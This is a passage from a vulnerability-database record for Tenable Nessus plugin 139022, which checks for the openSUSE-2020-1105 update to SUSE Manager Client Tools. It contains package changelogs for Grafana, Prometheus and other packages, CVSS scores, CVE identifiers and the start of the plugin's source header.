timestamp correctly when\n interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1,\n @davkal\n\n + Graph: Fixes legend issue clicking on series line icon\n and issue with horizontal scrollbar being visible on\n windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1\n match when loading query editor. #18480 5, @hugohaggmark\n 3\n\n + Prometheus: More consistently allows for multi-line\n queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4,\n @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and\n issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels\n with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if\n cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the\n cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12,\n @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but\n hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all\n given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for\n Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in\n label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user\n auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana\n variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch\n Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting\n to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from\n debian:stretch to avoid security issues&hellip; #17066\n 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895\n 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in\n explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns\n into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by\n field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by\n limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674\n 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793,\n @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425,\n @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3,\n @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table &\n sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1,\n @ATTron\n\n + Logging: Move log package to pkg/infra. #17023,\n @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2,\n @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and\n year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client\n certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery\n flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step\n alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range\n instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels\n query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist\n yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1,\n @dehrax\n\n + Singlestat: Add y min/max config to singlestat\n sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876,\n @zhulongcheng\n\n + Templating: Correctly display __text in multi-value\n variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a\n multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009\n 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2,\n @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel\n description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login\n failure due to SameSite cookie policy. #18332 1,\n @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of\n $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in\n Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2,\n @xlson\n\n + TimePicker: Fixed style issue for custom range popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges\n didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1,\n @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget\n . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql\n error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard\n requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061,\n @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table\n are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121,\n @marefr\n\n + Fix: Wrap value of multi variable in array when coming\n from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved\n last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with\n variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2,\n @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path\n prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label\n value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in\n interpolated PromQL variables. #16932, @Limess\n\n + Prometheus: Fix when adding label for metrics which\n contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value\n turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in\n %install, add to %files) handling of /var/lib/grafana/*\n and\n\nkoan :\n\n - Calculate relative path for kernel and inited when\n generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be\n disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for\n osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback\n (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with\n uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII\n chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled\n (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so\n scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards\n in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty\n (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2\n (bsc#1153090)\n\n - Java api expects content as encoded string instead of\n encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and\n Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc,\n configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to\n spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump\n (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for\n spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel\n definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl\n (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2\n systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "published": "2020-07-28T00:00:00", "modified": "2020-07-28T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, "href": "https://www.tenable.com/plugins/nessus/139022", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1154940", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113160", "https://bugzilla.opensuse.org/show_bug.cgi?id=1148177", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170557", "https://bugzilla.opensuse.org/show_bug.cgi?id=1171687", "https://bugzilla.opensuse.org/show_bug.cgi?id=1155372", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153277", "https://bugzilla.opensuse.org/show_bug.cgi?id=1168310", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170824", "https://bugzilla.opensuse.org/show_bug.cgi?id=1138822", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215", "https://bugzilla.opensuse.org/show_bug.cgi?id=1170231", "https://bugzilla.opensuse.org/show_bug.cgi?id=1154968", "https://bugzilla.opensuse.org/show_bug.cgi?id=1163871", "https://bugzilla.opensuse.org/show_bug.cgi?id=1172462", "https://bugzilla.opensuse.org/show_bug.cgi?id=1165921", "https://bugzilla.opensuse.org/show_bug.cgi?id=1142038", "https://bugzilla.opensuse.org/show_bug.cgi?id=1153090"], "cvelist": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "immutableFields": [], "lastseen": "2021-07-29T02:11:31", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["REDHAT-RHSA-2020-5599.NASL", "REDHAT-RHSA-2020-2641.NASL", "CENTOS8_RHSA-2020-2641.NASL", "SUSE_SU-2020-1970-1.NASL", "CENTOS8_RHSA-2020-1659.NASL", "FEDORA_2019-77D612EAB4.NASL", "FEDORA_2020-E6E81A03D6.NASL", "REDHAT-RHSA-2020-1659.NASL", "OPENSUSE-2020-892.NASL", "FEDORA_2019-0BB6B876DA.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1611-1", "OPENSUSE-SU-2020:0892-1", "OPENSUSE-SU-2020:1105-1", "OPENSUSE-SU-2020:1646-1"]}, {"type": "cve", "idList": ["CVE-2019-10215", "CVE-2020-13379", "CVE-2019-15043", "CVE-2020-12245"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-12245", "RH:CVE-2019-10215", "RH:CVE-2020-13379", "RH:CVE-2019-15043"]}, {"type": "attackerkb", "idList": ["AKB:72725B13-8444-4A5A-B4E8-71CF57FF5C25", "AKB:A4C40AA9-050B-4FF2-A029-BE3ADC6857CA"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-12245", "UB:CVE-2019-15043", "UB:CVE-2020-13379"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143778", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310142855", "OPENVAS:1361412562310877964", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310876781", "OPENVAS:1361412562310876775", "OPENVAS:1361412562310144077"]}, {"type": "symantec", "idList": ["SMNTC-110352"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ORACLE_LINUX-CVE-2020-12245/", "MSF:ILITIES/REDHAT_LINUX-CVE-2020-12245/", "MSF:ILITIES/SUSE-CVE-2020-12245/"]}, {"type": "fedora", "idList": ["FEDORA:B5BAF6085907", "FEDORA:E84B06062C8C", "FEDORA:77DCE3126D28", "FEDORA:6B2F331352FF"]}, {"type": "redhat", "idList": ["RHSA-2020:2641", "RHSA-2020:2792", "RHSA-2021:1518", "RHSA-2019:3771", "RHSA-2020:5599", "RHSA-2020:2861", "RHSA-2021:0083", "RHSA-2020:2796", "RHSA-2020:2676", "RHSA-2020:1659"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1659", "ELSA-2020-2641", "ELSA-2020-5726", "ELSA-2020-4682"]}, {"type": "archlinux", "idList": ["ASA-201908-21"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158320"]}, {"type": "exploitdb", "idList": ["EDB-ID:48638"]}, {"type": "zdt", "idList": ["1337DAY-ID-34640"]}, {"type": "avleonov", "idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"]}, {"type": "almalinux", "idList": ["ALSA-2020:4682"]}], "modified": "2021-07-29T02:11:31", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-07-29T02:11:31", "rev": 2}}, "objectVersion": "1.6", "pluginID": "139022", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1105.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139022);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2019-10215\", \"CVE-2019-15043\", \"CVE-2020-12245\", \"CVE-2020-13379\");\n\n script_name(english:\"openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)\");\n script_summary(english:\"Check for the openSUSE-2020-1105 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore\n remote read). #7096\n\n - Rules: `rule_evaluations_total` and\n `rule_evaluation_failures_total` have a `rule_group`\n label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a\n block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel\n configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group\n that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an\n empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web\n handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased\n memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries\n and recording rules are guaranteed to only see full\n scrapes and full recording rules. This comes with a\n certain overhead in resource usage. Depending on the\n situation, there might be some increase in memory usage,\n CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets\n page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload\n #6745\n\n - Scrape: Log scrape append failures as debug rather than\n warn #6852\n\n - TSDB: Improve query performance for queries that\n partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label\n #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s\n service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector\n #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834\n #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using\n non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote\n storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader\n metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling\n #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call'\n errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two\n scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file\n #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago'\n duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs\n with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only\n touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error\n messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape\n cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the\n metadata cache #6675\n\n - promtool: Add support for line-column numbers for\n invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary\n #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers\n #6553\n\n - React UI: adopt grafana flot fix for stacked graphs\n #6603\n\n - React UI: broken graph page browser history so that back\n button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered,\n and log proper error if one is returned from head.Init\n #6616\n\n - TSDB: return an error on ingesting series with duplicate\n labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine,\n which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if\n they are produced by multiple identical label matchers\n #6493\n\n - Scrape: Validate that OpenMetrics input ends with `#\n EOF` #6505\n\n - Remote read: return the correct error if configs can't\n be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed\n context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases\n where we would always be consistently behind by tracking\n pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a\n rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with\n Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: Fixed race on concurrent queries against same\n data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*`\n metrics. Additionally\n `prometheus_sd_kubernetes_workqueue_latency_seconds` and\n `prometheus_sd_kubernetes_workqueue_work_duration_second\n s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on\n `prometheus_remote_storage_*` metrics to `remote_name`\n and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded\n TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during\n compaction which should result in lower memory footprint\n during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention\n calculation. #5886\n\n - Remote read: Added query grouping and range hints to the\n remote read request #6401\n\n - Remote write: Added\n `prometheus_remote_storage_sent_bytes_total` counter per\n queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets`\n #6276, TSDB status page #6281 #6267 and many other fixes\n and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range\n and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss\n targets when configurations are similar. #6455\n\n - Remote write: Value of\n `prometheus_remote_storage_shards_desired` gauge shows\n raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and\n alerts where metric results collide with labels\n specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now\n accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and\n `/api/v1/status/buildinfo` endpoints added for use by\n the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime &\n Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a\n compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when\n checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in\n remote write. #6113\n\n - Remote write: do not reshard when unable to send\n samples. #6111\n\n - Service discovery: errors are no longer logged on\n context cancellation. #6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous\n response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for\n kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory\n usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired\n shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query\n history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate\n labels. #6026\n\n - UI: fixes service-discovery view when accessed from\n unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short\n input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le`\n architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API\n endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654,\n tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about\n out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty\n `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint\n number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build\n issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to\n IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317,\n @papagian\n\n - Configuration: Fix env var override of sections\n containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079,\n @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update\n after adding first transform. #25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix\n CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query\n history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992,\n @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705,\n @torkelo\n\n - Transformations: Display correct field name when using\n reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary\n operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not\n working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard\n link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to\n 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer\n limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries\n with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014,\n @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931,\n 